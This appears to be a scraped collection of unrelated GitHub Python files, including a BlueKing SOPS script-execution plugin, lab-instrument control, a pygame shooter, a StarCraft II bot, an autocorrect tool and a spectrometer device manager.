name=_(\"目标 IP\"),\n key=\"job_ip_list\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"执行脚本的目标机器 IP,多个用英文逗号 `,` 分隔\")),\n ),\n self.InputItem(\n name=_(\"目标账户\"),\n key=\"job_account\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"执行脚本的目标机器账户\")),\n ),\n self.InputItem(\n name=_(\"IP 存在性校验\"),\n key=\"ip_is_exist\",\n type=\"boolean\",\n schema=BooleanItemSchema(description=_(\"是否做 IP 存在性校验,如果ip校验开关打开,校验通过的ip数量若减少,即返回错误\")),\n ),\n ]\n\n def outputs_format(self):\n return super(JobFastExecuteScriptService, self).outputs_format() + [\n self.OutputItem(\n name=_(\"JOB全局变量\"),\n key=\"log_outputs\",\n type=\"object\",\n schema=ObjectItemSchema(\n description=_(\n \"输出日志中提取的全局变量,日志中形如 key:val 的变量会被提取到 log_outputs['key'] 中,值为 val\"\n ),\n property_schemas={\n \"name\": StringItemSchema(description=_(\"全局变量名称\")),\n \"value\": StringItemSchema(description=_(\"全局变量值\")),\n },\n ),\n ),\n ]\n\n def execute(self, data, parent_data):\n executor = parent_data.get_one_of_inputs(\"executor\")\n client = get_client_by_user(executor)\n ip_is_exist = data.get_one_of_inputs(\"ip_is_exist\")\n\n if parent_data.get_one_of_inputs(\"language\"):\n setattr(client, \"language\", parent_data.get_one_of_inputs(\"language\"))\n translation.activate(parent_data.get_one_of_inputs(\"language\"))\n\n biz_cc_id = data.get_one_of_inputs(\"biz_cc_id\", parent_data.inputs.biz_cc_id)\n original_ip_list = data.get_one_of_inputs(\"job_ip_list\")\n\n clean_result, target_server = self.get_target_server(\n executor, biz_cc_id, data, original_ip_list, self.logger, ip_is_exist\n )\n\n if not clean_result:\n return False\n\n job_kwargs = {\n \"bk_scope_type\": JobBizScopeType.BIZ.value,\n \"bk_scope_id\": str(biz_cc_id),\n \"bk_biz_id\": biz_cc_id,\n \"timeout\": data.get_one_of_inputs(\"job_script_timeout\"),\n \"account_alias\": data.get_one_of_inputs(\"job_account\"),\n \"target_server\": target_server,\n \"callback_url\": 
get_node_callback_url(self.root_pipeline_id, self.id, getattr(self, \"version\", \"\")),\n }\n\n script_param = str(data.get_one_of_inputs(\"job_script_param\"))\n\n if script_param:\n job_kwargs.update({\"script_param\": base64.b64encode(script_param.encode(\"utf-8\")).decode(\"utf-8\")})\n\n script_source = data.get_one_of_inputs(\"job_script_source\")\n if script_source in [\"general\", \"public\"]:\n job_kwargs.update({\"script_version_id\": data.get_one_of_inputs(\"job_script_list_%s\" % script_source)})\n else:\n job_kwargs.update(\n {\n \"script_language\": data.get_one_of_inputs(\"job_script_type\"),\n \"script_content\": base64.b64encode(data.get_one_of_inputs(\"job_content\").encode(\"utf-8\")).decode(\n \"utf-8\"\n ),\n }\n )\n job_result = client.jobv3.fast_execute_script(job_kwargs)\n self.logger.info(\"job_result: {result}, job_kwargs: {kwargs}\".format(result=job_result, kwargs=job_kwargs))\n if job_result[\"result\"]:\n job_instance_id = job_result[\"data\"][\"job_instance_id\"]\n data.outputs.job_inst_id = job_instance_id\n data.outputs.job_inst_name = job_result[\"data\"][\"job_instance_name\"]\n data.outputs.job_inst_url = get_job_instance_url(biz_cc_id, job_instance_id)\n data.outputs.client = client\n return True\n else:\n message = job_handle_api_error(\"jobv3.fast_execute_script\", job_kwargs, job_result)\n self.logger.error(message)\n data.outputs.ex_data = message\n return False\n\n def schedule(self, data, parent_data, callback_data=None):\n return super(JobFastExecuteScriptService, self).schedule(data, parent_data, callback_data)\n\n\nclass JobFastExecuteScriptComponent(Component):\n name = _(\"快速执行脚本\")\n code = \"job_fast_execute_script\"\n bound_service = JobFastExecuteScriptService\n form = \"%scomponents/atoms/job/job_fast_execute_script.js\" % settings.STATIC_URL\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/collections/sites/open/job/fast_execute_script/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"41100710383","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 5 22:45:52 2021\r\n\r\n@author: sammy\r\n\"\"\"\r\n\r\n\r\nimport pyvisa\r\nimport time\r\nimport numpy as np\r\n\r\ndef open(rm):\r\n srs = rm.open_resource('GPIB0::10::INSTR')\r\n print(srs.query('*IDN?'))\r\n dsp = rm.open_resource('GPIB0::12::INSTR')\r\n print(dsp.query('*IDN?'))\r\n therm = rm.open_resource('GPIB0::13::INSTR')\r\n print(therm.query('*IDN?'))\r\n isou = rm.open_resource('GPIB0::25::INSTR')\r\n isou.read_termination = '\\r'\r\n return srs, dsp, therm, isou\r\n\r\ndef getData(srs, dsp, therm, isou):\r\n srs.clear()\r\n srsR = float(srs.query('OUTP ? 3'))\r\n srsT = float(srs.query('OUTP ? 
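# ---------------------------------------------------------------------------\n# Aside: a hardware-free sketch of the reply parsing getData performs below --\n# the DSP lock-in returns comma-separated magnitude/phase, and the current\n# source prefixes its reading with 'R'. The reply strings are assumptions, not\n# captured instrument output.\n_dsp_reply = '1.234e-3,-0.56'\n_dsp_r, _dsp_t = (float(v) for v in _dsp_reply.split(','))\n_isou_reply = 'R0.125'\n_i_val = float(_isou_reply.split('R')[1])\n# -> _dsp_r = 0.001234, _dsp_t = -0.56, _i_val = 0.125\n# ---------------------------------------------------------------------------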
4'))\r\n \r\n dsp.clear()\r\n DSPstr = dsp.query('MP.')\r\n vals = DSPstr.split(\",\")\r\n dspR = float(vals[0])\r\n dspT = float(vals[1])\r\n \r\n tempA = therm.query('INPUT A:TEMPER?')\r\n \r\n isou.clear()\r\n Inow = isou.query('R0\\r')\r\n istuff = Inow.split(\"R\")\r\n Ival = float(istuff[1])\r\n \r\n retVal = [Ival, tempA, srsR, srsT, dspR, dspT]\r\n return retVal\r\n\r\ndef setMax(isou, maxi):\r\n stri = 'I' + str(maxi) + '\\r'\r\n isou.write(stri)\r\n isou.read()\r\n \r\ndef setSign(isou, booli):\r\n if(booli):\r\n isou.write('P1\\r')\r\n isou.read()\r\n else:\r\n isou.write('P2\\r')\r\n isou.read()\r\n \r\ndef startRamp(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n isou.write('A1\\r')\r\n isou.read()\r\n \r\ndef hold(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n\r\nIset = 1.0\r\nbooli = True\r\nrm = pyvisa.ResourceManager()\r\nprint(rm.list_resources())\r\nsrs, dsp, therm, isou = open(rm)\r\nisou.clear()\r\nsetMax(isou, Iset)\r\nsetSign(isou, booli)\r\nstartRamp(isou)\r\nfor i in range(0, 100):\r\n ret = getData(srs, dsp, therm, isou)\r\n print(ret)\r\n if(np.abs(ret[0]) == Iset):\r\n booli = not booli\r\n setSign(isou, booli)\r\n startRamp(isou)\r\n time.sleep(1)\r\nhold(isou)","repo_name":"SamuelMumford/GUIData","sub_path":"GPIBTest.py","file_name":"GPIBTest.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26053614297","text":"import os\nimport pygame\nimport globals\nfrom os import listdir\nfrom os.path import isfile, join\n\nclass Crosshair(pygame.sprite.Sprite):\n\n\t# Constructor\n\tdef __init__(self, xOffset = 16, yOffset = 16):\n\t\t# Call the parent class (Sprite) constructor\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = pygame.image.load(os.path.join(globals.data_dir, 'img/crosshair.png'))\n\t\tself.mask = pygame.mask.from_surface(self.image)\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = (16, 16)\n\t\tself.xOffset = xOffset\n\t\tself.yOffset = yOffset\n\n\tdef update(self):\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tself.rect.x = mousePos[0] - self.xOffset\n\t\tself.rect.y = mousePos[1] - self.yOffset\n \t\t\nclass Gun(pygame.sprite.Sprite):\n\tbulletsLeft = 0\n\n\t# Constructor\n\tdef __init__(self):\n\t\t# Call the parent class (Sprite) constructor\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.bulletsLeft = globals.gunMaxBullets\n\t\tself.image = pygame.image.load(os.path.join(globals.data_dir, 'img/gun.png'))\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = (229, 181)\n\t\tself.rect.y = globals.winHeight-160\n\n\tdef update(self):\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tself.rect.x = mousePos[0]+64\n \t\t\nclass Gunshot(pygame.sprite.Sprite):\n\tframes = []\n\tframeRepeat = 3\n\tsteps = 0\n\n\t# Constructor\n\tdef __init__(self):\n\t\t# Call the parent class (Sprite) constructor\n\t\tpygame.sprite.Sprite.__init__(self)\n\n\t\t# Get all frames\n\t\tpath = \"data/img/gunshot/\"\n\t\tframes = [f for f in listdir(path) if isfile(join(path, f))]\n\n\t\t# Put all frames in a list of Pygame images\n\t\tself.images = []\n\t\tfor frame in frames:\n\t\t\tself.images.append(pygame.image.load(path + frame))\n\n\t\tself.index = 0\n\t\tself.image = self.images[self.index]\n\t\tself.rect = self.image.get_rect()\n\n\t\t# Position\n\t\tmousePos = pygame.mouse.get_pos()\n\t\tself.rect.x = mousePos[0]+20\n\t\tself.rect.y = globals.winHeight-212\n\n\tdef update(self):\n\t\tif self.index >= 
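# ---------------------------------------------------------------------------\n# Aside: the frame-repeat trick used by Gunshot.update below, isolated -- the\n# sprite frame only advances every frame_repeat-th update() call, slowing the\n# animation without touching the game clock. Pure-Python sketch:\n_frame_repeat, _steps, _index = 3, 0, 0\nfor _ in range(9):  # nine simulated update() calls\n    if _steps % _frame_repeat == 0:\n        _index += 1  # advance the animation frame\n    _steps += 1\n# after 9 updates: _index == 3, i.e. one frame per three calls\n# ---------------------------------------------------------------------------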
len(self.images):\n\t\t\tself.kill()\n\t\telse:\n\t\t\tself.image = self.images[self.index]\n\t\t\tself.image.set_colorkey((0, 0, 0))\n\t\t\tmousePos = pygame.mouse.get_pos()\n\t\t\tself.rect.x = mousePos[0]+20\n\n\t\t\t# This will make sure that we repeat frames\n\t\t\t# so animation looks a bit slower\n\t\t\tif self.steps % self.frameRepeat == 0:\n\t\t\t\tself.index += 1\n\t\t\tself.steps += 1","repo_name":"TaffoVelikoff/ViolentCityGame","sub_path":"resources/classes/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25983526353","text":"\n\nimport sc2\nfrom sc2 import run_game, maps, Race, Difficulty\nfrom sc2.player import Bot, Computer\nfrom sc2.unit import Unit\n\nfrom sc2.constants import UnitTypeId\n\nfrom sc2.ids.ability_id import AbilityId\n\nimport pickle\n\nfrom MicroAgentC1 import MicroAgentC1\n\nfrom buildOrder import *\n\nclass TestBot1(MicroAgentC1):\n\n def __init__(self):\n\n #This is a simple zerg build setup to start with\n bo1 = [BO_Supply(TriggerSupply(13)),\n BO_Build(TriggerSupply(16),UnitTypeId.SPAWNINGPOOL),\n BO_Gas(TriggerReady(UnitTypeId.SPAWNINGPOOL,50)),\n BO_Supply(TriggerSupply(19)),\n BO_GasHarvesting(TriggerResourceCount(0,96),False),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n BO_Build(TriggerSupply(21), UnitTypeId.ZERGLING, count=2),\n BO_AutoSupply(TriggerSupply(22),True),\n BO_UnitPriorities(TriggerSupply(22), [UnitTypeId.ZERGLING])\n ]\n\n #Simple BO to research speed early game (to test things like gas and research\n bo2= [ BO_Build(TriggerSupply(13), UnitTypeId.SPAWNINGPOOL),\n BO_Gas(TriggerImmediate()),\n BO_Supply(TriggerImmediate()),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n #TODO: maybe 2 or 4 lings for protection here? 
and scouting?\n BO_AutoSupply(TriggerImmediate(), True),\n BO_GasHarvesting(TriggerResourceCount(0, 96), False),\n BO_Upgrade(TriggerImmediate(), UpgradeId.ZERGLINGMOVEMENTSPEED),\n BO_Build(TriggerImmediate(), UnitTypeId.QUEEN),\n BO_UnitPriorities(TriggerSupply(20),[UnitTypeId.ZERGLING]),\n BO_Expand(TriggerResourceCount(250)),\n BO_AttackAllIn(TriggerSupply(30)), # not the best trigger but it's a start\n BO_Build(TriggerResourceCount(250), UnitTypeId.QUEEN),\n BO_Build(TriggerResourceCount(300), UnitTypeId.QUEEN),\n ]\n\n\n #Simple hatch first BO to see if drone balance and queen stuff can work\n bo3 = [#TODO: extractor trick?\n BO_Expand(TriggerSupply(14)),\n BO_Gas(TriggerImmediate()),\n BO_Build(TriggerSupply(14), UnitTypeId.SPAWNINGPOOL),\n BO_Supply(TriggerImmediate()),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n BO_AutoSupply(TriggerImmediate(), True),\n BO_GasHarvesting(TriggerResourceCount(0,96),False), # remove drones once we have 100 gas!\n BO_UnitPriorities(TriggerImmediate(), [UnitTypeId.ZERGLING]),\n BO_Build(TriggerSupply(19), UnitTypeId.QUEEN),\n BO_Upgrade(TriggerResourceCount(100,100), UpgradeId.ZERGLINGMOVEMENTSPEED)\n ]\n\n #Simply test to build queens and see what they can do\n bo4 = [\n BO_Build(TriggerImmediate(), UnitTypeId.SPAWNINGPOOL),\n BO_AutoSupply(TriggerImmediate(), True),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n BO_Build(TriggerReady(UnitTypeId.SPAWNINGPOOL), UnitTypeId.QUEEN),\n ]\n\n super(TestBot1,self).__init__(bo2)\n\n\n\n async def on_step(self, iteration: int):\n\n if iteration == 1:\n #pickle.dump(self.game_info.placement_grid, open(\"placement.p\",\"wb\"))\n #pickle.dump(self.state.creep, open(\"creep.p\", \"wb\"))\n #pickle.dump(self.state.visibility, open(\"vis.p\", \"wb\"))\n #pickle.dump(self.game_info.terrain_height, open(\"height.p\", \"wb\"))\n #pickle.dump(self.game_info.pathing_grid, open(\"path.p\", \"wb\"))\n print(f\"start location: {self.start_location}\")\n\n #Call base agent step first\n #This takes care of some low level stuff first at highest priority\n await super(TestBot1,self).on_step(iteration)\n\n ### Basic Observations & State updates ###\n\n\n ### Macro ###\n self.player_id\n\n\n\nrun_game(maps.get(\"Simple64\"), [\n Bot(Race.Zerg, TestBot1()),\n Computer(Race.Protoss, Difficulty.VeryHard)\n #Bot(Race.Zerg, TestBot1()),\n], realtime=True , game_time_limit=480.0)\n\n\n\n#run_game(maps.get(\"Abyssal Reef LE\"), [\n# Bot(Race.Zerg, TestBot1()),\n# Computer(Race.Protoss, Difficulty.Medium)\n#], realtime=True , game_time_limit=120.0)\n\n","repo_name":"MarcaunonXtreme/sc2_agentx","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16546062155","text":"import requests\nimport time\nimport json\nwhile True:\n #Import quotes via API\n quotation = requests.get('https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL')\n quotation = quotation.json()\n \n #Filter the desired values in Dollars\n quotation_dolar = quotation['USDBRL']['bid']\n value_pay_dolar = '5.12'\n #Filters the desired values in Euro\n quotation_euro = quotation['EURBRL']['bid']\n value_pay_euro ='6.196'\n #Filter the desired values in Bitcoin\n quotation_bitcoin = quotation['BTCBRL']['bid']\n value_pay_bitcoin = '190000' \\\n ''\n #Print desired values\n print('Dólar $:', quotation_dolar,'R$ |', 'Euro €:',quotation_euro,'R$ |','BitCoin 
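# ---------------------------------------------------------------------------\n# Aside: the awesomeapi payload delivers each 'bid' as a string, so numeric\n# comparison has to go through float(), as the checks below do. Tiny\n# illustration with an assumed payload shape:\n_payload = {'USDBRL': {'bid': '4.98'}}\n_bid = float(_payload['USDBRL']['bid'])\n_reached = _bid < 5.12  # True: the quote has dropped below the target\n# ---------------------------------------------------------------------------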
₿:',quotation_bitcoin,'R$')\n\n    #Compare the values with the objective (bids arrive as strings, so cast to float)\n    if (float(quotation_dolar) < float(value_pay_dolar)):\n        print('The dollar reached the target value')\n    if (float(quotation_euro) < float(value_pay_euro)):\n        print('The euro reached the target value')\n    if (float(quotation_bitcoin) < float(value_pay_bitcoin)):\n        print('Bitcoin reached the target value')\n\n    time.sleep(2)\n\n\n\n","repo_name":"llucasrafaell/stock-exchange","sub_path":"StockExchange.py","file_name":"StockExchange.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40805203080","text":"# -*- coding: utf-8 -*-\nimport pickle as p\nimport numpy as np\nimport os\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ndef load_MNIST(file_dir):\n    return input_data.read_data_sets(file_dir,one_hot = True)\n\n\ndef load_CIFAR_batch(filename):\n    \"\"\" Load a single batch of the CIFAR dataset \"\"\"\n    with open(filename, 'rb') as f:\n        datadict = p.load(f, encoding='latin1')\n        X = datadict['data']\n        Y = datadict['labels']\n        X = X.reshape(10000, 3, 32, 32).transpose(0, 2, 3, 1)#.astype(\"float\")\n        Y = np.array(Y)\n        return X, Y\n\ndef load_CIFAR10(file_dir):\n    \"\"\" Load the full CIFAR dataset \"\"\"\n    xs = []\n    ys = []\n    Xtr = []\n    Ytr = []\n    for b in range(1,6):\n        data_file = os.path.join(file_dir, 'data_batch_%d' % (b,))\n        X, Y = load_CIFAR_batch(data_file)\n\n        xs.append(X) # collect all batches together\n        ys.append(Y)\n    Xtr = np.concatenate(xs) # stack the batches; final Xtr shape is (50000,32,32,3)\n    Ytr = np.concatenate(ys)\n    Xte, Yte = load_CIFAR_batch(os.path.join(file_dir, 'test_batch'))\n    return Xtr, Ytr, Xte, Yte\n\n\n\n# cifar10_dir = 'data_set/cifar-10-batches-py/'\n# X_train, Y_train, X_test, Y_test = load_CIFAR10(cifar10_dir)\n#\n# def unpickle(file):\n#     with open(file, 'rb') as fo:\n#         dict = p.load(fo, encoding='bytes')\n#     return dict\n# classes = unpickle(cifar10_dir+\"batches.meta\")\n# print(classes)","repo_name":"jainszhang/LearnDM","sub_path":"DL/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42287113424","text":"import os\nimport re\nfrom copy import deepcopy\n\nimport numpy as np\nfrom numpy import unique\n\n\nclass AutoCorrect:\n    def __init__(self):\n        pass\n\n    def process_data(self, file_name):\n        words = []\n        file = open(f\"{os.getcwd()}/{file_name}\", \"r\")\n        content = file.read()\n        content_lower = content.lower()\n        lines = content_lower.split('\\n')\n        for line in lines:\n            words_line = line.split(' ')\n            for word_line in words_line:\n                letters_only = re.sub(\"[^A-Za-z0-9]+\", \"\", word_line)\n                if len(letters_only) > 0:\n                    words.append(letters_only)\n        words = words[:10] + words[2775:]\n        return words\n\n    def get_count(self, word_l):\n        word_count_dict = {}\n        for word in word_l:\n            word_count_dict[word] = 1 if word not in word_count_dict.keys() else word_count_dict[word] + 1\n        return word_count_dict\n\n    def get_probs(self, word_count_dict):\n        probs = {}\n        for word in word_count_dict.keys():\n            probs[word] = word_count_dict[word] / np.sum(list(word_count_dict.values()))\n        return probs\n\n    def delete_letter(self, word, verbose=False):\n        delete_l = []\n        for index in range(len(word)):\n            delete_l.append(word[:index] + word[index + 1:])\n        return delete_l\n\n    def switch_letter(self, word, verbose=False):\n        switch_l = []\n        for index in range(len(word) - 1):\n            switch_l.append(word[:index] + word[index + 1] + word[index] + word[index + 2:])\n        return switch_l\n\n    def 
replace_letter(self, word, verbose=False):\n letters = 'abcdefghijklmnopqrstuvwxyz'\n replace_l = []\n for index in range(len(word)):\n for letter in letters:\n word_replaced = word[:index] + letter + word[index + 1:]\n if word_replaced not in replace_l + [word]:\n replace_l.append(word_replaced)\n return sorted(replace_l)\n\n def insert_letter(self, word, verbose=False):\n letters = 'abcdefghijklmnopqrstuvwxyz'\n insert_l = []\n for index in range(len(word) + 1):\n for letter in letters:\n insert_l.append(word[:index] + letter + word[index:])\n return insert_l\n\n def edit_one_letter(self, word, allow_switches=True):\n return set(unique(self.insert_letter(word) + self.delete_letter(word) + self.replace_letter(word) + self.switch_letter(word)))\n\n def edit_two_letters(self, word, allow_switches=True):\n edit_two_set = []\n edit_one_set = self.edit_one_letter(word)\n for word in edit_one_set:\n edit_two_set += self.edit_one_letter(word)\n return set(edit_two_set)\n\n def edit_n_letters(self, edit_set, word, n=1):\n if n == 1:\n return self.edit_one_letter(word)\n edit_set_next = []\n for edit_word in edit_set:\n edit_set_next.append(self.edit_one_letter(edit_word))\n return self.edit_n_letters(edit_set_next, word, n - 1)\n\n def get_corrections(self, word, probs, vocab, n=2, verbose=False):\n if word in vocab:\n return [word]\n edit_probs_total = {}\n for edit_distance in range(1, n):\n edit_probs = {edit_word: probs[edit_word] for edit_word in self.edit_n_letters([], word, n=edit_distance).intersection(vocab)}\n edit_probs_total.update(edit_probs)\n max_probs = sorted(list(edit_probs_total.values()))[len(edit_probs_total.values()) - n:]\n edit_words = []\n for index in range(len(edit_probs_total.keys())):\n edit_word, edit_word_prob = list(edit_probs_total.keys())[index], list(edit_probs_total.values())[index]\n if edit_word_prob in max_probs:\n edit_words.append((edit_word, edit_word_prob))\n return sorted(edit_words, key=lambda edit_tuple: edit_tuple[1], reverse=True)\n\n def min_edit_distance(self, source, target, ins_cost=1, del_cost=1, rep_cost=2):\n rows, columns = len(source), len(target)\n distances = np.zeros((rows + 1, columns + 1), dtype=int)\n for row in range(0, rows + 1):\n distances[row, 0] = row * ins_cost\n for column in range(0, columns + 1):\n distances[0, column] = column * del_cost\n for row in range(1, rows + 1):\n for column in range(1, columns + 1):\n r_cost = 0 if source[row - 1] == target[column - 1] else rep_cost\n distances[row, column] = min(distances[row - 1, column - 1] + r_cost, distances[row - 1, column] + ins_cost, distances[row, column - 1] + del_cost)\n return distances, distances[rows, columns]\n\nif __name__ == '__main__':\n auto_correct = AutoCorrect()\n vocab = auto_correct.process_data('/data/shakespeare.txt')\n word_count_dict = auto_correct.get_count(vocab)\n probs = auto_correct.get_probs(word_count_dict)\n auto_correct.delete_letter(word=\"cans\", verbose=True)\n auto_correct.switch_letter(word=\"eta\", verbose=True)\n auto_correct.replace_letter(word='can', verbose=True)\n auto_correct.insert_letter('at', True)\n auto_correct.edit_one_letter('can', True)\n auto_correct.edit_two_letters(\"at\")\n auto_correct.edit_two_letters(\"at\")\n auto_correct.get_corrections(\"dys\", probs, vocab, 2, verbose=True)\n auto_correct.min_edit_distance('star', 'stack', ins_cost=2, del_cost=2, 
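# ---------------------------------------------------------------------------\n# Aside: a compact, standard Wagner-Fischer sketch for comparison with the\n# min_edit_distance method above (unit costs here; the method also lets you\n# weight insert/delete/replace differently).\ndef _edit_distance(a, b):\n    prev = list(range(len(b) + 1))  # distances from '' to each prefix of b\n    for i, ca in enumerate(a, start=1):\n        cur = [i]\n        for j, cb in enumerate(b, start=1):\n            cur.append(min(prev[j] + 1,  # delete from a\n                           cur[j - 1] + 1,  # insert into a\n                           prev[j - 1] + (ca != cb)))  # replace, free on match\n        prev = cur\n    return prev[-1]\n# _edit_distance('star', 'stack') == 2 (replace 'r'->'c', then insert 'k')\n# ---------------------------------------------------------------------------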
rep_cost=3)","repo_name":"nitsansoffair/auto_correct","sub_path":"src/AutoCorrect.py","file_name":"AutoCorrect.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19969089849","text":"import sys\nimport time\nimport logging\nimport threading\n\nfrom wasatch.WasatchDevice import WasatchDevice\nfrom wasatch.WasatchBus import WasatchBus\n\nlogger = logging.getLogger(__name__)\n\nclass Device_Manager:\n    def __init__(self, msg_queues):\n        self.msg_queues = msg_queues\n        self.device = None\n        connected = False\n        self.msg_response_funcs = {\n            'EEPROM': self.get_eeprom,\n            'HAS_BATTERY': self.has_battery,\n            'BATTERY': self.battery,\n            'GET_GAIN': self.get_gain,\n            'SET_GAIN': self.set_gain,\n            'SET_INT_TIME': self.set_int_time,\n            'GET_INT_TIME': self.get_int_time,\n            'GET_SPECTRA': self.get_spectra,\n            'GET_ROI': self.get_roi,\n            'SET_ROI': self.set_roi,\n            'SET_LASER': self.set_laser,\n            'SET_WATCHDOG': self.set_laser_watchdog,\n            'SET_RAMAN_DELAY': self.set_raman_delay,\n            'GET_LASER_STATE': self.get_laser_state,\n            'GET_WATCHDOG_DELAY': self.get_watch_delay,\n            'GET_RAMAN_DELAY': self.get_raman_delay,\n            'GET_RAMAN_MODE': self.get_raman_mode,\n        }\n        self.connection_thread = threading.Thread(target=self.connect_new_spec)\n        self.connection_thread.start()\n        worker_thread = threading.Thread(target=self.device_worker)\n        worker_thread.start()\n        self.conn_watch = threading.Thread(target=self.connection_watchdog)\n        self.conn_watch.start()\n\n    def connection_watchdog(self):\n        if self.check_device_connected() and self.connection_thread is None:\n            logger.info(\"Device Manager: Identified lost connection with spectrometer. Attempting to reconnect.\")\n            self.connection_thread = threading.Thread(target=self.connect_new_spec)\n            self.connection_thread.start()\n        time.sleep(1)\n\n    def connect_new_spec(self):\n        logger.info(\"Device Manager: Trying to connect new spectrometer.\")\n        connected = False\n        self.connection_attempt_count = 0\n        logging.getLogger().setLevel(logging.INFO)\n        while not connected:\n            try:\n                self.connection_attempt_count += 1\n                bus = WasatchBus()\n                uid = bus.device_ids[0]\n                self.device = WasatchDevice(uid)\n                ok = self.device.connect()\n                if not ok:\n                    raise\n                self.device.change_setting(\"integration_time_ms\", 10)\n                self.update_settings()\n                self.connection_attempt_count = 0\n                logging.getLogger().setLevel(logging.DEBUG)\n                logger.info(\"Device Manager: Succeeded in device connection.\")\n                self.connection_thread = None\n                connected = True\n            except:\n                if self.connection_attempt_count < 3:\n                    logger.error(\"Device Manager: Unable to connect. Retrying.\")\n                if self.connection_attempt_count == 4:\n                    logger.error(\"Device Manager: Unable to connect after 3 tries. 
Continuing but suppressing log statements.\")\n                time.sleep(1)\n\n    # In WasatchDevice, process_commands is normally driven by the continuous poll,\n    # but that does not happen for many of these asynchronous commands,\n    # so this function ensures they aren't stuck in the queue\n    def update_settings(self):\n        self.device.process_commands()\n\n    def is_valid_command(self, command):\n        command = command.replace('\\n','')\n        command = command.upper()\n        return self.msg_response_funcs.get(command,False)\n\n    def device_worker(self):\n        while True:\n            for comm_method in self.msg_queues.keys():\n                if not self.msg_queues[comm_method]['send'].empty():\n                    priority, data = self.msg_queues[comm_method]['send'].get_nowait()\n                    msg_id = data[\"Id\"]\n                    msg = data[\"Message\"]\n                    logger.debug(f\"Device Manager: Received request from {comm_method} of {msg}\")\n                    self.process_msg(msg_id, msg, comm_method)\n\n    def check_device_connected(self):\n        # The rather messy following line is meant to check if we are still connected\n        # Not all errors immediately indicate a connection issue nor do connection issues bubble up from Wasatch.PY\n        return self.device is None or self.device.hardware is None or (self.device.hardware.shutdown_requested or (not self.device.hardware.connected and not self.device.hardware.connecting))\n\n    def process_msg(self, msg_id, msg, comm_method):\n        msg_cmd = msg['Command'].upper()\n        process_func = self.msg_response_funcs.get(msg_cmd,None)\n        if process_func is not None:\n            msg_response = process_func(msg['Value'])\n            if msg_response[\"Error\"] is not None:\n                logger.error(f\"Device Manager: Encountered error of {msg_response['Error']} while handling msg {msg} from msg id {msg_id}\")\n            if self.check_device_connected():\n                msg_response[\"Error\"] = \"Device is not connected. Check connection then send a few commands to verify reconnection.\"\n            logger.info(\"Device Manager: Providing msg response\")\n            self.msg_queues[comm_method]['recv'].put((msg_id, msg_response))\n        else:\n            logger.error(f\"Device Manager: Received invalid request of {msg} from msg id {msg_id}\")\n            self.msg_queues[comm_method]['recv'].put((msg_id,'INVALID_OPTION'))\n    \n    def get_eeprom(self, not_used):\n        try:\n            self.device.settings.eeprom.generate_write_buffers()\n            eeprom = self.device.settings.eeprom.write_buffers\n            return {\"Res_Value\": eeprom, \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get eeprom {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get eeprom\"}\n\n    def has_battery(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.settings.eeprom.has_battery, \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to check for battery {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to check for battery\"}\n\n    def battery(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.hardware.get_battery_percentage(), \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get battery % {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get battery %\"}\n\n    def get_gain(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.hardware.get_detector_gain(), \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get gain. 
